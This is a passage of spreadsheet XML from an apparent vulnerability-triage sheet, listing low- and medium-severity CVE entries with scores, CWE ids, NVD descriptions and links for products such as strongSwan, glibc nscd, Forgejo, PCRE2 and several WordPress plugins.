      </c>
      <c r="I871" s="5" t="inlineStr"/>
      <c r="J871" s="5" t="inlineStr"/>
      <c r="K871" s="5" t="inlineStr"/>
      <c r="L871" s="5" t="inlineStr"/>
      <c r="M871" s="5" t="inlineStr"/>
      <c r="N871" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O871" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P871" s="5" t="inlineStr"/>
      <c r="Q871" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R871" s="5" t="inlineStr">
        <is>
          <t>The Reviso Exporter for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check and missing nonce verification on the disconnect_callback() function in versions up to, and including, 1.2.3. The function is registered to the 'wp_ajax_wcefr-disconnect' AJAX action and unconditionally calls delete_option('wcefr-agt'), which removes the Reviso Agreement Grant Token used to authenticate API calls. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete the plugin's stored Agreement Grant Token, breaking the connection between WooCommerce and the Reviso service.</t>
        </is>
      </c>
      <c r="S871" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8615</t>
        </is>
      </c>
    </row>
    <row r="872">
      <c r="A872" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B872" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C872" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9160</t>
        </is>
      </c>
      <c r="D872" s="5" t="n">
        <v>4.3</v>
      </c>
      <c r="E872" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F872" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G872" s="5" t="inlineStr"/>
      <c r="H872" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I872" s="5" t="inlineStr"/>
      <c r="J872" s="5" t="inlineStr"/>
      <c r="K872" s="5" t="inlineStr"/>
      <c r="L872" s="5" t="inlineStr"/>
      <c r="M872" s="5" t="inlineStr"/>
      <c r="N872" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O872" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P872" s="5" t="inlineStr"/>
      <c r="Q872" s="5" t="inlineStr">
        <is>
          <t>CWE-1336</t>
        </is>
      </c>
      <c r="R872" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in a template engine vulnerability in Arma Digital Media Inc. Website Template allows Code Injection.
This issue affects Website Template: through 11092026. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="S872" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9160</t>
        </is>
      </c>
    </row>
    <row r="873">
      <c r="A873" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B873" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C873" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89092</t>
        </is>
      </c>
      <c r="D873" s="5" t="n">
        <v>4.2</v>
      </c>
      <c r="E873" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F873" s="5" t="inlineStr">
        <is>
          <t>3ff69d7a-14f2-4f67-a097-88dee7810d18</t>
        </is>
      </c>
      <c r="G873" s="5" t="inlineStr"/>
      <c r="H873" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I873" s="5" t="inlineStr"/>
      <c r="J873" s="5" t="inlineStr"/>
      <c r="K873" s="5" t="inlineStr"/>
      <c r="L873" s="5" t="inlineStr"/>
      <c r="M873" s="5" t="inlineStr"/>
      <c r="N873" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O873" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P873" s="5" t="inlineStr"/>
      <c r="Q873" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="R873" s="5" t="inlineStr">
        <is>
          <t>The nscd service in the GNU C Library 2.3.4 onwards may crash due to a 
stack overflow when a malicious DNS server returns too large a response 
for a DNS query, resulting in degraded DNS resolution for the system.
Exploitation of this bug needs a system that has nscd enabled and using 
an untrusted DNS server for name resolution, with the compromised DNS 
server being capable of processing records large enough to result in a 
stack overflow in an nscd thread stack.  During experimentation, bind 9 
was unable to handle large records, but that could change in future or 
with a different name server.  In typical installations, nscd is 
executed in an isolated context as its own user without a shell, due to 
which any compromise of that service is isolated.
There is a remote possibility of nscd cache corruption if an attacker 
manages to get the stack pointer into a desired point in the heap, 
potentially resulting in other caches in nscd being overwritten with 
corrupt data through the stack overflow, until the buggy code path 
eventually results in a crash.
Finally, a crash in nscd may result in performance degradation when 
resolving names, but it does not result in a denial of service.</t>
        </is>
      </c>
      <c r="S873" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89092</t>
        </is>
      </c>
    </row>
    <row r="874">
      <c r="A874" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B874" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C874" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89169</t>
        </is>
      </c>
      <c r="D874" s="5" t="n">
        <v>4.1</v>
      </c>
      <c r="E874" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F874" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G874" s="5" t="inlineStr"/>
      <c r="H874" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I874" s="5" t="inlineStr"/>
      <c r="J874" s="5" t="inlineStr"/>
      <c r="K874" s="5" t="inlineStr"/>
      <c r="L874" s="5" t="inlineStr"/>
      <c r="M874" s="5" t="inlineStr"/>
      <c r="N874" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O874" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P874" s="5" t="inlineStr"/>
      <c r="Q874" s="5" t="inlineStr">
        <is>
          <t>CWE-347</t>
        </is>
      </c>
      <c r="R874" s="5" t="inlineStr">
        <is>
          <t>live-boot ff8867c allows attackers to bypass the dm-verity-enforce-roothash-signature protection mechanism when the .verity file is missing.</t>
        </is>
      </c>
      <c r="S874" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89169</t>
        </is>
      </c>
    </row>
    <row r="875">
      <c r="A875" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B875" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C875" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78124</t>
        </is>
      </c>
      <c r="D875" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E875" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F875" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G875" s="5" t="inlineStr"/>
      <c r="H875" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I875" s="5" t="inlineStr"/>
      <c r="J875" s="5" t="inlineStr"/>
      <c r="K875" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L875" s="5" t="inlineStr"/>
      <c r="M875" s="5" t="inlineStr"/>
      <c r="N875" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O875" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P875" s="5" t="inlineStr"/>
      <c r="Q875" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R875" s="5" t="inlineStr">
        <is>
          <t>strongSwan 5.0.2 through 6.0.7 allows PKCS#7 certificate enumeration in the openssl plugin that leads to a lack of release of memory after its effective lifetime.</t>
        </is>
      </c>
      <c r="S875" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78124</t>
        </is>
      </c>
    </row>
    <row r="876">
      <c r="A876" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B876" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C876" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78127</t>
        </is>
      </c>
      <c r="D876" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E876" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F876" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G876" s="5" t="inlineStr"/>
      <c r="H876" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I876" s="5" t="inlineStr"/>
      <c r="J876" s="5" t="inlineStr"/>
      <c r="K876" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L876" s="5" t="inlineStr"/>
      <c r="M876" s="5" t="inlineStr"/>
      <c r="N876" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O876" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P876" s="5" t="inlineStr"/>
      <c r="Q876" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R876" s="5" t="inlineStr">
        <is>
          <t>libcharon in strongSwan 4.1.2 through 6.0.7 has a missing release of memory after its effective lifetime in the IKE message parser.</t>
        </is>
      </c>
      <c r="S876" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78127</t>
        </is>
      </c>
    </row>
    <row r="877">
      <c r="A877" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B877" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C877" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78131</t>
        </is>
      </c>
      <c r="D877" s="5" t="n">
        <v>3.7</v>
      </c>
      <c r="E877" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F877" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G877" s="5" t="inlineStr"/>
      <c r="H877" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I877" s="5" t="inlineStr"/>
      <c r="J877" s="5" t="inlineStr"/>
      <c r="K877" s="5" t="inlineStr">
        <is>
          <t>strongswan:strongswan</t>
        </is>
      </c>
      <c r="L877" s="5" t="inlineStr"/>
      <c r="M877" s="5" t="inlineStr"/>
      <c r="N877" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O877" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P877" s="5" t="inlineStr"/>
      <c r="Q877" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="R877" s="5" t="inlineStr">
        <is>
          <t>strongSwan 4.2.0 through 6.0.7 has a missing release of memory after its effective lifetime in the x509 plugin's attribute certificate parser.</t>
        </is>
      </c>
      <c r="S877" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78131</t>
        </is>
      </c>
    </row>
    <row r="878">
      <c r="A878" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B878" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C878" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-15695</t>
        </is>
      </c>
      <c r="D878" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E878" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F878" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G878" s="5" t="inlineStr"/>
      <c r="H878" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I878" s="5" t="inlineStr"/>
      <c r="J878" s="5" t="inlineStr"/>
      <c r="K878" s="5" t="inlineStr"/>
      <c r="L878" s="5" t="inlineStr"/>
      <c r="M878" s="5" t="inlineStr"/>
      <c r="N878" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O878" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P878" s="5" t="inlineStr"/>
      <c r="Q878" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R878" s="5" t="inlineStr">
        <is>
          <t>The Translate WordPress with GTranslate WordPress plugin before 3.0.10 does not validate one of its settings before the bundled front-end scripts build markup from it, allowing users with a role as high as administrator to store JavaScript that runs in the session of any visitor to the site.</t>
        </is>
      </c>
      <c r="S878" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-15695</t>
        </is>
      </c>
    </row>
    <row r="879">
      <c r="A879" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B879" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C879" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89151</t>
        </is>
      </c>
      <c r="D879" s="5" t="n">
        <v>3.5</v>
      </c>
      <c r="E879" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F879" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G879" s="5" t="inlineStr"/>
      <c r="H879" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I879" s="5" t="inlineStr"/>
      <c r="J879" s="5" t="inlineStr"/>
      <c r="K879" s="5" t="inlineStr"/>
      <c r="L879" s="5" t="inlineStr"/>
      <c r="M879" s="5" t="inlineStr"/>
      <c r="N879" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O879" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P879" s="5" t="inlineStr"/>
      <c r="Q879" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R879" s="5" t="inlineStr">
        <is>
          <t>Forgejo before 16.0.4 allows use of restricted API tokens for unintended access to the "allow maintainer edit" feature.</t>
        </is>
      </c>
      <c r="S879" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89151</t>
        </is>
      </c>
    </row>
    <row r="880">
      <c r="A880" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B880" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C880" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79693</t>
        </is>
      </c>
      <c r="D880" s="5" t="n">
        <v>3.4</v>
      </c>
      <c r="E880" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F880" s="5" t="inlineStr">
        <is>
          <t>security_alert@emc.com</t>
        </is>
      </c>
      <c r="G880" s="5" t="inlineStr"/>
      <c r="H880" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I880" s="5" t="inlineStr"/>
      <c r="J880" s="5" t="inlineStr"/>
      <c r="K880" s="5" t="inlineStr">
        <is>
          <t>dell:secure_connect_gateway</t>
        </is>
      </c>
      <c r="L880" s="5" t="inlineStr"/>
      <c r="M880" s="5" t="inlineStr"/>
      <c r="N880" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O880" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P880" s="5" t="inlineStr"/>
      <c r="Q880" s="5" t="inlineStr">
        <is>
          <t>CWE-272</t>
        </is>
      </c>
      <c r="R880" s="5" t="inlineStr">
        <is>
          <t>Dell SCG 5.0 Appliance versions prior to 5.36.00.16 and Dell SCG 5.0 Application versions prior to 5.36.00.00, contains a Least Privilege Violation vulnerability. A high privileged attacker with local access could potentially exploit this vulnerability, leading to unauthorized access.</t>
        </is>
      </c>
      <c r="S880" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79693</t>
        </is>
      </c>
    </row>
    <row r="881">
      <c r="A881" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B881" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C881" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-11765</t>
        </is>
      </c>
      <c r="D881" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E881" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G881" s="5" t="inlineStr"/>
      <c r="H881" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I881" s="5" t="inlineStr"/>
      <c r="J881" s="5" t="inlineStr"/>
      <c r="K881" s="5" t="inlineStr"/>
      <c r="L881" s="5" t="inlineStr"/>
      <c r="M881" s="5" t="inlineStr"/>
      <c r="N881" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O881" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P881" s="5" t="inlineStr"/>
      <c r="Q881" s="5" t="inlineStr">
        <is>
          <t>CWE-88</t>
        </is>
      </c>
      <c r="R881" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of argument delimiters in a command ('argument injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Pen allows Argument Injection.
This issue affects Pardus Pen: before 4.2.1.</t>
        </is>
      </c>
      <c r="S881" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-11765</t>
        </is>
      </c>
    </row>
    <row r="882">
      <c r="A882" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B882" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89162</t>
        </is>
      </c>
      <c r="D882" s="5" t="n">
        <v>3.3</v>
      </c>
      <c r="E882" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr"/>
      <c r="Q882" s="5" t="inlineStr">
        <is>
          <t>CWE-669</t>
        </is>
      </c>
      <c r="R882" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_serialize_encode might disclose two bytes to an adversary, typically in a situation where the access available to the adversary is already unsafe.</t>
        </is>
      </c>
      <c r="S882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89162</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48707</t>
        </is>
      </c>
      <c r="D883" s="5" t="n">
        <v>3.1</v>
      </c>
      <c r="E883" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F883" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr"/>
      <c r="Q883" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R883" s="5" t="inlineStr">
        <is>
          <t>InstantCMS is a free and open source content management system. Versions prior to 2.18.2 have a Server-Side Request Forgery (SSRF) vulnerability in the file upload functionality (`system/core/uploader.php` at lines 509-532). When the "upload from URL" feature follows an HTTP redirect, the redirected target URL bypasses the private IP address blacklist check. This allows authenticated users to scan and access internal network services. Version 2.18.2 contains a fix.</t>
        </is>
      </c>
      <c r="S883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48707</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58616</t>
        </is>
      </c>
      <c r="D884" s="5" t="n">
        <v>3</v>
      </c>
      <c r="E884" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr">
        <is>
          <t>microsoft:edge_chromium</t>
        </is>
      </c>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-08-28</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr"/>
      <c r="Q884" s="5" t="inlineStr">
        <is>
          <t>CWE-362</t>
        </is>
      </c>
      <c r="R884" s="5" t="inlineStr">
        <is>
          <t>Concurrent execution using shared resource with improper synchronization ('race condition') in Copilot Chat (Microsoft Edge) allows an authorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="S884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58616</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86231</t>
        </is>
      </c>
      <c r="D885" s="5" t="n">
        <v>2.9</v>
      </c>
      <c r="E885" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F885" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-06</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr"/>
      <c r="Q885" s="5" t="inlineStr">
        <is>
          <t>CWE-298, CWE-299</t>
        </is>
      </c>
      <c r="R885" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in mwiede jsch up to 2.28.5. Affected is the function getRevokedKeys of the file src/main/java/com/jcraft/jsch/KnownHosts.java. Performing a manipulation of the argument known_hosts results in improper check for certificate revocation. The attack is possible to be carried out remotely. The attack is considered to have high complexity. The exploitability is told to be difficult. The exploit has been released to the public and may be used for attacks. Upgrading to version 2.28.6 is able to address this issue. The patch is named 194a2f76a5c0f1c3f778565be3fd66bcafc42d23. You should upgrade the affected component.</t>
        </is>
      </c>
      <c r="S885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86231</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86779</t>
        </is>
      </c>
      <c r="D886" s="5" t="n">
        <v>2.7</v>
      </c>
      <c r="E886" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F886" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr"/>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr"/>
      <c r="Q886" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="R886" s="5" t="inlineStr">
        <is>
          <t>The Visualizer  WordPress plugin before 4.0.6 does not properly authorise chart-deletion requests, performing only a site-wide capability check with no per-object ownership verification, allowing users with the Contributor role and above to permanently delete any chart on the site, including charts created by other users such as administrators.</t>
        </is>
      </c>
      <c r="S886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86779</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89145</t>
        </is>
      </c>
      <c r="D887" s="5" t="n">
        <v>2.4</v>
      </c>
      <c r="E887" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
      <c r="F887" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr"/>
      <c r="Q887" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R887" s="5" t="inlineStr">
        <is>
          <t>Flextype CMS versions 0.9.9 through 1.0.0-alpha.3 fail to HTML-escape plugin directory names in the dependency error page rendered by getValidPluginsDependencies(). Attackers with write access to the plugins directory can create a plugin with HTML characters in its name to execute arbitrary scripts in users' browsers when dependency validation fails.</t>
        </is>
      </c>
      <c r="S887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89145</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-44911</t>
        </is>
      </c>
      <c r="D888" s="5" t="n">
        <v>2.3</v>
      </c>
      <c r="E888" s="5" t="inlineStr">
        <is>
          <t>LOW</t>
        </is>
      </c>
